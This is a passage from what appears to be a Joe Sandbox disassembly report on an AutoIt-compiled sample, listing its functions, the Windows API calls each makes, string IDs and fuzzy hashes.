                                                          • Opcode Fuzzy Hash: 2ebc004e14a27f4b0fd14d9f8593c1833dd3ed42994d6fabc67f868c35c9513a
                                                          • Instruction Fuzzy Hash: 1B617075A006199FCB16EF64C881AAEBBF5FF48314F15846AE855AF761CB30AD40CF90
                                                          Function 003A127E Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetParent.USER32(?), ref: 003A12BD
                                                          • GetKeyboardState.USER32(?), ref: 003A12D2
                                                          • SetKeyboardState.USER32(?), ref: 003A1333
                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 003A1361
                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 003A1380
                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 003A13C6
                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 003A13E9
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$Parent
                                                          • String ID:
                                                          • API String ID: 87235514-0
                                                          • Opcode ID: cf854c31ca6a169bf82c9ee500e14fefd5c0b2bc09a85bf95e5cc8ecc456da37
                                                          • Instruction ID: 1cab886c6676df73c8c96a6cccba69ee95ed3252bc61a61b067ffefba03edbc7
                                                          • Opcode Fuzzy Hash: cf854c31ca6a169bf82c9ee500e14fefd5c0b2bc09a85bf95e5cc8ecc456da37
                                                          • Instruction Fuzzy Hash: BB51D3A0A147D53DFF3746388C45BBABEA99F07304F098589E1D58A8C2C2D9ECD8D750
                                                          Function 003A1097 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetParent.USER32(00000000), ref: 003A10D6
                                                          • GetKeyboardState.USER32(?), ref: 003A10EB
                                                          • SetKeyboardState.USER32(?), ref: 003A114C
                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 003A1178
                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 003A1195
                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 003A11D9
                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 003A11FA
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$Parent
                                                          • String ID:
                                                          • API String ID: 87235514-0
                                                          • Opcode ID: 5f7c454ccb05221c6f57e7b836471d9b8ff98b61f65c13fe014e7ed6c0874ac8
                                                          • Instruction ID: 841b088b3bda893d2dcfe046b6120ed7b0f818f93dbf5be18f19270c3aae47e7
                                                          • Opcode Fuzzy Hash: 5f7c454ccb05221c6f57e7b836471d9b8ff98b61f65c13fe014e7ed6c0874ac8
                                                          • Instruction Fuzzy Hash: BB51E7A05447D63DFB378734CC45B7ABFA9DB07300F094989E1D59A8C2D294EC98E750
                                                          Function 003A56A4 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _wcsncpy$LocalTime
                                                          • String ID:
                                                          • API String ID: 2945705084-0
                                                          • Opcode ID: 3c416c169d949de98254f2bbe971242bfff6ad514216b2137d3ea9ab1ef2c435
                                                          • Instruction ID: e5549a6b30d6fccdcb70cc21594739bffe9168e94da6da47edba9d6522e26ae1
                                                          • Opcode Fuzzy Hash: 3c416c169d949de98254f2bbe971242bfff6ad514216b2137d3ea9ab1ef2c435
                                                          • Instruction Fuzzy Hash: 9C41A3A5C2091875CB12EBB498469DFB7BCEF06310F11C866F518E7165E734E744C3A9
                                                          Function 0039D87B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0039D8E3
                                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0039D919
                                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0039D92A
                                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0039D9AC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                                          • String ID: ,,=$DllGetClassObject
                                                          • API String ID: 753597075-4126740902
                                                          • Opcode ID: 6658a01decbb5eade28b4d0ce0fc86a2ef74728db69a83d48c2064a1b33ba15f
                                                          • Instruction ID: a026904ab3c7fd1ef268e6b0dd435bed63c4c5f53232bf208b13ddead4550b76
                                                          • Opcode Fuzzy Hash: 6658a01decbb5eade28b4d0ce0fc86a2ef74728db69a83d48c2064a1b33ba15f
                                                          • Instruction Fuzzy Hash: 98418E72600204EFDF06EF55C885AAABBB9EF45314F1581A9ED06DF205D7B1DE40CBA0
                                                          Function 003A36B5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 003A46AF: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003A36DB,?), ref: 003A46CC
                                                            • Part of subcall function 003A46AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003A36DB,?), ref: 003A46E5
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 003A36FB
                                                          • _wcscmp.LIBCMT ref: 003A3717
                                                          • MoveFileW.KERNEL32(?,?), ref: 003A372F
                                                          • _wcscat.LIBCMT ref: 003A3777
                                                          • SHFileOperationW.SHELL32(?), ref: 003A37E3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                          • String ID: \*.*
                                                          • API String ID: 1377345388-1173974218
                                                          • Opcode ID: 8d5f058d22cb94928955436c12895b6fde4f0c6db4c7fe40aa6d84e3160559e4
                                                          • Instruction ID: c5d058e57226b9c8c375aeb933dd081411fd46de04168f0dea8ea066fc1b3f5f
                                                          • Opcode Fuzzy Hash: 8d5f058d22cb94928955436c12895b6fde4f0c6db4c7fe40aa6d84e3160559e4
                                                          • Instruction Fuzzy Hash: AE417CB2508344AEC753EF64D441ADBB7ECEF8A340F00092EF49AC7161EA35D688C756
                                                          Function 003C72C3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _memset.LIBCMT ref: 003C72DC
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003C7383
                                                          • IsMenu.USER32(?), ref: 003C739B
                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003C73E3
                                                          • DrawMenuBar.USER32 ref: 003C73F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                                          • String ID: 0
                                                          • API String ID: 3866635326-4108050209
                                                          • Opcode ID: 9c2e48db6629026da4f4c93866a69b482f6efa0698ffc6384a41e1f4777ee373
                                                          • Instruction ID: 0ac2ed1505a43c5b196263bb6729ee49176d27433d77683e316089eed6c2b64b
                                                          • Opcode Fuzzy Hash: 9c2e48db6629026da4f4c93866a69b482f6efa0698ffc6384a41e1f4777ee373
                                                          • Instruction Fuzzy Hash: FA413675A04208EFDB22DF51D884E9ABBF9FB09314F058029ED15EB260D730AD50DFA0
                                                          Function 003C102D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 003C105C
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003C1086
                                                          • FreeLibrary.KERNEL32(00000000), ref: 003C113D
                                                            • Part of subcall function 003C102D: RegCloseKey.ADVAPI32(?), ref: 003C10A3
                                                            • Part of subcall function 003C102D: FreeLibrary.KERNEL32(?), ref: 003C10F5
                                                            • Part of subcall function 003C102D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 003C1118
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 003C10E0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                          • String ID:
                                                          • API String ID: 395352322-0
                                                          • Opcode ID: a140502f9ecde0273c7d767af2bb9849dde5248a83eed1513a375abba0110c2b
                                                          • Instruction ID: 423fc995802f204ed723158abd890d39b62bbb1e7d0b41746307e902072f07ab
                                                          • Opcode Fuzzy Hash: a140502f9ecde0273c7d767af2bb9849dde5248a83eed1513a375abba0110c2b
                                                          • Instruction Fuzzy Hash: BA310D71901119BFDB16DB94DC89EFEB7BCEF09340F044169E501E2151DA74AE85ABA0
                                                          Function 003C62FF Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 003C631E
                                                          • GetWindowLongW.USER32(01745310,000000F0), ref: 003C6351
                                                          • GetWindowLongW.USER32(01745310,000000F0), ref: 003C6386
                                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 003C63B8
                                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003C63E2
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 003C63F3
                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003C640D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: LongWindow$MessageSend
                                                          • String ID:
                                                          • API String ID: 2178440468-0
                                                          • Opcode ID: 71c3d853eefee305252e9dc9b61cec1b54e99826b4924a48f841180b27f85164
                                                          • Instruction ID: 83c70eb1bc918c7fecf1255552c85062d5f986acf78d0b9791b5cc4d89ec727c
                                                          • Opcode Fuzzy Hash: 71c3d853eefee305252e9dc9b61cec1b54e99826b4924a48f841180b27f85164
                                                          • Instruction Fuzzy Hash: F931F235604290AFDB22DF18EC86F5937E5FB4A710F1A41A8F900DF2B2CB72AC509B51
                                                          Function 003B6289 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 003B7EA0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 003B7ECB
                                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 003B62DC
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003B62EB
                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 003B6324
                                                          • connect.WSOCK32(00000000,?,00000010), ref: 003B632D
                                                          • WSAGetLastError.WSOCK32 ref: 003B6337
                                                          • closesocket.WSOCK32(00000000), ref: 003B6360
                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 003B6379
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                          • String ID:
                                                          • API String ID: 910771015-0
                                                          • Opcode ID: 9c7443c0f8b014901b7e3ee522dc91d5d7c2ae92665f9ecdc55696276589074f
                                                          • Instruction ID: c56b69fae234801fa1954a26dda18d84c694d965c952fd03d9600b5d320dcb30
                                                          • Opcode Fuzzy Hash: 9c7443c0f8b014901b7e3ee522dc91d5d7c2ae92665f9ecdc55696276589074f
                                                          • Instruction Fuzzy Hash: A031A135600218AFDB129F64CC86FFE77EDEB44764F054029FA09DB291DB74AC048BA1
                                                          Function 0039F98F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp
                                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                          • API String ID: 1038674560-2734436370
                                                          • Opcode ID: e4aca7f3fa428bbc3f9c5d2adc82bb1cf9575187d0aef03361d12a2477a4e6ed
                                                          • Instruction ID: 04023970915e01757058c79e2ccedd96a59c347feb19a18182469f62a7281645
                                                          • Opcode Fuzzy Hash: e4aca7f3fa428bbc3f9c5d2adc82bb1cf9575187d0aef03361d12a2477a4e6ed
                                                          • Instruction Fuzzy Hash: E72129331086127EDB37AA259C02FBB73DCDF65714F508036F88ACE586EB919D42C6A5
                                                          Function 003C75FF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00341D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00341D73
                                                            • Part of subcall function 00341D35: GetStockObject.GDI32(00000011), ref: 00341D87
                                                            • Part of subcall function 00341D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00341D91
                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 003C7664
                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 003C7671
                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 003C767C
                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 003C768B
                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 003C7697
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                          • String ID: Msctls_Progress32
                                                          • API String ID: 1025951953-3636473452
                                                          • Opcode ID: b43366b2db9c3c2cc178c4696b9d99f4c51bd674ebe2ce4c0a3a816b6f1d5b44
                                                          • Instruction ID: aff52a97e7b55aa00eb5f04b32f0f46055c2988f6e5bf8bf8b6164af33156436
                                                          • Opcode Fuzzy Hash: b43366b2db9c3c2cc178c4696b9d99f4c51bd674ebe2ce4c0a3a816b6f1d5b44
                                                          • Instruction Fuzzy Hash: DA11B2B211021DBFEF129F64CC85EE77F6DEF087A8F014115BA04A6090C772AC21DBA4
                                                          Function 003CB669 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _memset.LIBCMT ref: 003CB678
                                                          • _memset.LIBCMT ref: 003CB687
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00406F20,00406F64), ref: 003CB6B6
                                                          • CloseHandle.KERNEL32 ref: 003CB6C8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _memset$CloseCreateHandleProcess
                                                          • String ID: o@$do@
                                                          • API String ID: 3277943733-129461833
                                                          • Opcode ID: fde221d828e6c92d3a7aca4eb7efbe09f05a6c650b1cea1cc2ff2dd27acc3380
                                                          • Instruction ID: fa206ecf758a1873a69ee9f3baa5274a6280b1ec91c60e6d0142d9515ce3caa4
                                                          • Opcode Fuzzy Hash: fde221d828e6c92d3a7aca4eb7efbe09f05a6c650b1cea1cc2ff2dd27acc3380
                                                          • Instruction Fuzzy Hash: 38F089B15403057EE2113771BC06F777A9DEB08354F018035BA09F9195DB755C2087AC
                                                          Function 00364109 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,003641D2,?), ref: 00364123
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0036412A
                                                          • EncodePointer.KERNEL32(00000000), ref: 00364136
                                                          • DecodePointer.KERNEL32(00000001,003641D2,?), ref: 00364153
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                          • String ID: RoInitialize$combase.dll
                                                          • API String ID: 3489934621-340411864
                                                          • Opcode ID: 4173b6417b975a67868ff532acde0266d5084b7cb5338049cc567f98105fbcbf
                                                          • Instruction ID: 68ad7c4bd8c22d2423d69b8861e6b86e2409e80c855f4479095be5ef9b30b494
                                                          • Opcode Fuzzy Hash: 4173b6417b975a67868ff532acde0266d5084b7cb5338049cc567f98105fbcbf
                                                          • Instruction Fuzzy Hash: 62E01A74A90340AEEB125F70ED09F453AAEB75AB03F108434F411E91A0DBB56184CF04
                                                          Function 003641DE Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,003640F8), ref: 003641F8
                                                          • GetProcAddress.KERNEL32(00000000), ref: 003641FF
                                                          • EncodePointer.KERNEL32(00000000), ref: 0036420A
                                                          • DecodePointer.KERNEL32(003640F8), ref: 00364225
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                          • String ID: RoUninitialize$combase.dll
                                                          • API String ID: 3489934621-2819208100
                                                          • Opcode ID: 4775ddb550a28a425729351f3a9145c9eda64578ba87a1e632f40e390fa2a173
                                                          • Instruction ID: dd2a82809768aff51818204d3bf12b832cf57925b80e49b79699c811e352736f
                                                          • Opcode Fuzzy Hash: 4775ddb550a28a425729351f3a9145c9eda64578ba87a1e632f40e390fa2a173
                                                          • Instruction Fuzzy Hash: B5E0B674981300AFEB129F61EE0DF463EAEBB18743F254435F111E91A4CFB69604CB18
                                                          Function 003A6561 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _memmove$__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 3253778849-0
                                                          • Opcode ID: 7fe6833ffc20f216a3d564ae34438bba101dc299b41390e98e0434201a377c08
